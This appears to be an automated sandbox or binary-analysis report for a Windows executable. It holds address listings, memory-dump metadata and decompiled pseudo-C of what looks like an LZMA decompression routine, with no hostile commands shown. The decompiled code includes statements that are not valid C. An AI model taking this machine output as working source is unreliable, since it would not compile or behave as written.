0x00406893
0x00406896
0x004068c0
0x004068c6
0x004068cd
0x00000000
0x004068cd
0x00406898
0x0040689c
0x0040689f
0x004068a4
0x004068a4
0x004068af
0x004068b5
0x004068b7
0x004068ba
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004068ff
0x00406905
0x00406908
0x00406915
0x0040691d
0x00000000
0x00000000
0x004068d4
0x004068d4
0x004068d8
0x00407123
0x00000000
0x00407123
0x004068e4
0x004068ef
0x004068ef
0x004068ef
0x004068f2
0x004068f5
0x004068f8
0x004068fb
0x004068fd
0x00000000
0x00000000
0x00000000
0x00000000
0x00406f94
0x00406f94
0x00406f9a
0x00406fa0
0x00406fa3
0x00406fa6
0x00406fc0
0x00406fc3
0x00406fc9
0x00406fd4
0x00406fd4
0x00406fd6
0x00406fa8
0x00406fa8
0x00406fb7
0x00406fbb
0x00406fbb
0x00406fd9
0x00406fe0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406fe2
0x00406fe2
0x00406fe6
0x00407195
0x00000000
0x00407195
0x00406ff2
0x00406ff9
0x00407001
0x00407001
0x00407001
0x00407004
0x00407007
0x00407007
0x00000000
0x00000000
0x00406925
0x00406927
0x0040692a
0x0040699b
0x0040699e
0x004069a1
0x004069a8
0x004069b2
0x00000000
0x004069b2
0x0040692c
0x00406930
0x00406933
0x00406935
0x00406938
0x0040693b
0x0040693d
0x00406940
0x00406942
0x00406947
0x0040694a
0x0040694d
0x00406951
0x00406958
0x0040695b
0x00406962
0x00406966
0x0040696e
0x0040696e
0x0040696e
0x00406968
0x00406968
0x00406968
0x0040695d
0x0040695d
0x0040695d
0x00406972
0x00406975
0x00406993
0x00406995
0x00000000
0x00406995
0x00406977
0x0040697a
0x0040697d
0x00406980
0x00406982
0x00406982
0x00406982
0x00406985
0x00406988
0x0040698a
0x0040698b
0x0040698e
0x00000000
0x00000000
0x00406bc4
0x00406bc8
0x00406be6
0x00406be9
0x00406bf0
0x00406bf3
0x00406bf6
0x00406bf9
0x00406bfc
0x00406bff
0x00406c01
0x00406c08
0x00406c09
0x00406c0b
0x00406c0e
0x00406c11
0x00406c14
0x00406c14
0x00406c19
0x00000000
0x00406c19
0x00406bca
0x00406bcd
0x00406bd0
0x00406bda
0x00000000
0x00000000
0x00406c2e
0x00406c32
0x00406c55
0x00406c58
0x00406c5b
0x00406c65
0x00406c34
0x00406c34
0x00406c37
0x00406c3a
0x00406c3d
0x00406c4a
0x00406c4d
0x00406c4d
0x00000000
0x00000000
0x00406c71
0x00406c75
0x00000000
0x00000000
0x00406c7b
0x00406c7f
0x00000000
0x00000000
0x00406c85
0x00406c87
0x00406c8b
0x00406c8b
0x00406c8e
0x00406c92
0x00000000
0x00000000
0x00406ce2
0x00406ce6
0x00406ced
0x00406cf0
0x00406cf3
0x00406cfd
0x00000000
0x00406cfd
0x00406ce8
0x00000000
0x00000000
0x00406d09
0x00406d0d
0x00406d14
0x00406d17
0x00406d1a
0x00406d0f
0x00406d0f
0x00406d0f
0x00406d1d
0x00406d20
0x00406d23
0x00406d23
0x00406d26
0x00406d29
0x00406d2c
0x00406d2c
0x00406d2f
0x00406d36
0x00406d3b
0x00000000
0x00000000
0x00406dc9
0x00406dc9
0x00406dcd
0x0040716b
0x00000000
0x0040716b
0x00406dd3
0x00406dd6
0x00406dd9
0x00406ddd
0x00406de0
0x00406de6
0x00406de8
0x00406de8
0x00406de8
0x00406deb
0x00406dee
0x00000000
0x00000000
0x004069be
0x004069be
0x004069c2
0x0040712f
0x00000000
0x0040712f
0x004069c8
0x004069cb
0x004069ce
0x004069d2
0x004069d5
0x004069db
0x004069dd
0x004069dd
0x004069dd
0x004069e0
0x004069e3
0x004069e3
0x004069e6
0x004069e9
0x00000000
0x00000000
0x004069ef
0x004069f5
0x00000000
0x00000000
0x004069fb
0x004069fb
0x004069ff
0x00406a02
0x00406a05
0x00406a08
0x00406a0b
0x00406a0c
0x00406a0f
0x00406a11
0x00406a17
0x00406a1a
0x00406a1d
0x00406a20
0x00406a23
0x00406a26
0x00406a29
0x00406a45
0x00406a48
0x00406a4b
0x00406a4e
0x00406a55
0x00406a59
0x00406a5b
0x00406a5f
0x00406a2b
0x00406a2b
0x00406a2f
0x00406a37
0x00406a3c
0x00406a3e
0x00406a40
0x00406a40
0x00406a62
0x00406a69
0x00406a6c
0x00000000
0x00406a72
0x00000000
0x00406a72
0x00000000
0x00406a77
0x00406a77
0x00406a7b
0x0040713b
0x00000000
0x0040713b
0x00406a81
0x00406a84
0x00406a87
0x00406a8b
0x00406a8e
0x00406a94
0x00406a96
0x00406a96
0x00406a96
0x00406a99
0x00406a9c
0x00406a9c
0x00406a9c
0x00406aa2
0x00000000
0x00000000
0x00406aa4
0x00406aa7
0x00406aaa
0x00406aad
0x00406ab0
0x00406ab3
0x00406ab6
0x00406ab9
0x00406abc
0x00406abf
0x00406ac2
0x00406ada
0x00406add
0x00406ae0
0x00406ae3
0x00406ae3
0x00406ae6
0x00406aea
0x00406aec
0x00406ac4
0x00406ac4
0x00406acc
0x00406ad1
0x00406ad3
0x00406ad5
0x00406ad5
0x00406aef
0x00406af6
0x00406af9
0x00000000
0x00406afb
0x00000000
0x00406afb
0x00406af9
0x00406b00
0x00406b00
0x00406b00
0x00406b00
0x00000000
0x00000000
0x00406b3b
0x00406b3b
0x00406b3f
0x00407147
0x00000000
0x00407147
0x00406b45
0x00406b48
0x00406b4b
0x00406b4f
0x00406b52
0x00406b58
0x00406b5a
0x00406b5a
0x00406b5a
0x00406b5d
0x00406b60
0x00406b60
0x00406b66
0x00406b04
0x00406b04
0x00406b07
0x00000000
0x00406b07
0x00406b68
0x00406b68
0x00406b6b
0x00406b6e
0x00406b71
0x00406b74
0x00406b77
0x00406b7a
0x00406b7d
0x00406b80
0x00406b83
0x00406b86
0x00406b9e
0x00406ba1
0x00406ba4
0x00406ba7
0x00406ba7
0x00406baa
0x00406bae
0x00406bb0
0x00406b88
0x00406b88
0x00406b90
0x00406b95
0x00406b97
0x00406b99
0x00406b99
0x00406bb3
0x00406bba
0x00406bbd
0x00000000
0x00406bbf
0x00000000
0x00406bbf
0x00000000
0x00406e4c
0x00406e4c
0x00406e50
0x00407177
0x00000000
0x00407177
0x00406e56
0x00406e59
0x00406e5c
0x00406e60
0x00406e63
0x00406e69
0x00406e6b
0x00406e6b
0x00406e6b
0x00406e6e
0x00000000
0x00000000
0x00406c1c
0x00406c1c
0x00406c1f
0x00000000
0x00000000
0x00406f5b
0x00406f5f
0x00406f81
0x00406f84
0x00406f8e
0x00406f91
0x00406f91
0x00000000
0x00406f91
0x00406f61
0x00406f64
0x00406f68
0x00406f6b
0x00406f6b
0x00406f6e
0x00000000
0x00000000
0x00407018
0x0040701c
0x0040703a
0x0040703a
0x0040703a
0x00407041
0x00407048
0x0040704f
0x0040704f
0x00000000
0x0040704f
0x0040701e
0x00407021
0x00407024
0x00407027
0x0040702e
0x00406f72
0x00406f72
0x00406f75
0x00000000
0x00000000
0x00407109
0x0040710c
0x00000000
0x00000000
0x00406d43
0x00406d45
0x00406d4c
0x00406d4d
0x00406d4f
0x00406d52
0x00000000
0x00000000
0x00406d5a
0x00406d5d
0x00406d60
0x00406d62
0x00406d64
0x00406d64
0x00406d65
0x00406d68
0x00406d6f
0x00406d72
0x00406d80
0x00000000
0x00000000
0x00407056
0x00407056
0x00407059
0x00407060
0x00000000
0x00000000
0x00407065
0x00407065
0x00407069
0x004071a1
0x00000000
0x004071a1
0x0040706f
0x00407072
0x00407075
0x00407079
0x0040707c
0x00407082
0x00407084
0x00407084
0x00407084
0x00407087
0x0040708a
0x0040708a
0x0040708a
0x0040708a
0x0040708d
0x0040708d
0x00407091
0x004070f1
0x004070f4
0x004070f9
0x004070fa
0x004070fc
0x004070fe
0x00407101
0x0040700d
0x0040700d
0x00000000
0x0040700d
0x00407093
0x00407099
0x0040709c
0x0040709f
0x004070a2
0x004070a5
0x004070a8
0x004070ab
0x004070ae
0x004070b1
0x004070b4
0x004070cd
0x004070d0
0x004070d3
0x004070d6
0x004070da
0x004070dc
0x004070dc
0x004070dd
0x004070e0
0x004070b6
0x004070b6
0x004070be
0x004070c3
0x004070c5
0x004070c8
0x004070c8
0x004070e3
0x004070ea
0x00000000
0x004070ec
0x00000000
0x004070ec
0x00000000
0x00406d88
0x00406d8b
0x00406dc1
0x00406ef1
0x00406ef1
0x00406ef1
0x00406ef1
0x00406ef4
0x00406ef4
0x00406ef7
0x00406ef9
0x00407183
0x00000000
0x00407183
0x00406eff
0x00406f02
0x00000000
0x00000000
0x00406f08
0x00406f0c
0x00406f0f
0x00406f0f
0x00406f0f
0x00000000
0x00406f0f
0x00406d8d
0x00406d8f
0x00406d91
0x00406d93
0x00406d96
0x00406d97
0x00406d99
0x00406d9b
0x00406d9e
0x00406da1
0x00406db7
0x00406dbc
0x00406df4
0x00406df4
0x00406df8
0x00406e24
0x00406e26
0x00406e2d
0x00406e30
0x00406e33
0x00406e33
0x00406e38
0x00406e38
0x00406e3a
0x00406e3d
0x00406e44
0x00406e47
0x00406e74
0x00406e74
0x00406e77
0x00406e7a
0x00406eee
0x00406eee
0x00406eee
0x00000000
0x00406eee
0x00406e7c
0x00406e82
0x00406e85
0x00406e88
0x00406e8b
0x00406e8e
0x00406e91
0x00406e94
0x00406e97
0x00406e9a
0x00406e9d
0x00406eb6
0x00406eb8
0x00406ebb
0x00406ebc
0x00406ebf
0x00406ec1
0x00406ec4
0x00406ec6
0x00406ec8
0x00406ecb
0x00406ecd
0x00406ed0
0x00406ed4
0x00406ed6
0x00406ed6
0x00406ed7
0x00406eda
0x00406edd
0x00406e9f
0x00406e9f
0x00406ea7
0x00406eac
0x00406eae
0x00406eb1
0x00406eb1
0x00406ee0
0x00406ee7
0x00406e71
0x00406e71
0x00406e71
0x00406e71
0x00000000
0x00406ee9
0x00000000
0x00406ee9
0x00406ee7
0x00406dfa
0x00406dfd
0x00406dff
0x00406e02
0x00406e05
0x00406e08
0x00406e0a
0x00406e0d
0x00406e10
0x00406e10
0x00406e13
0x00406e13
0x00406e16
0x00406e1d
0x00406df1
0x00406df1
0x00406df1
0x00406df1
0x00000000
0x00406e1f
0x00000000
0x00406e1f
0x00406e1d
0x00406da3
0x00406da6
0x00406da8
0x00406dab
0x00000000
0x00000000
0x00406b0a
0x00406b0a
0x00406b0e
0x00407153
0x00000000
0x00407153
0x00406b14
0x00406b17
0x00406b1a
0x00406b1d
0x00406b20
0x00406b23
0x00406b26
0x00406b28
0x00406b2b
0x00406b2e
0x00406b31
0x00406b33
0x00406b33
0x00406b33
0x00000000
0x00000000
0x00406c95
0x00406c95
0x00406c99
0x0040715f
0x00000000
0x0040715f
0x00406c9f
0x00406ca2
0x00406ca5
0x00406ca8
0x00406caa
0x00406caa
0x00406caa
0x00406cad
0x00406cb0
0x00406cb3
0x00406cb6
0x00406cb9
0x00406cbc
0x00406cbd
0x00406cbf
0x00406cbf
0x00406cbf
0x00406cc2
0x00406cc5
0x00406cc8
0x00406ccb
0x00406ccb
0x00406ccb
0x00406cce
0x00406cd0
0x00406cd0
0x00000000
0x00000000
0x00406f12
0x00406f12
0x00406f12
0x00406f16
0x00000000
0x00000000
0x00406f1c
0x00406f1f
0x00406f22
0x00406f25
0x00406f27
0x00406f27
0x00406f27
0x00406f2a
0x00406f2d
0x00406f30
0x00406f33
0x00406f36
0x00406f39
0x00406f3a
0x00406f3c
0x00406f3c
0x00406f3c
0x00406f3f
0x00406f42
0x00406f45
0x00406f48
0x00406f4b
0x00406f4f
0x00406f51
0x00406f54
0x00000000
0x00406f56
0x00406cd3
0x00406cd3
0x00000000
0x00406cd3
0x00406f54
0x00407189
0x004071ab
0x004071b1
0x004071b3
0x004071ba
0x00000000
0x00000000
0x004067b8
0x004071c0
0x004071c0
0x00000000

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d3c90e2c2c281b0151b8bc02d48c609eaff53916cbf358625803cc36882de51
Instruction ID: 8282c7973928a3a8991f4aebeb421c6794774a39cdfa424cdd26f1de73b17733
Opcode Fuzzy Hash: 4d3c90e2c2c281b0151b8bc02d48c609eaff53916cbf358625803cc36882de51
Instruction Fuzzy Hash: 74816571D14228DBDF28CFA8C844BADBBB1FB44305F14816AD856BB2C1C7786A86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406BC4, Relevance: 5.2, APIs: 4, Instructions: 180
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406BC4() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M004071C8))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
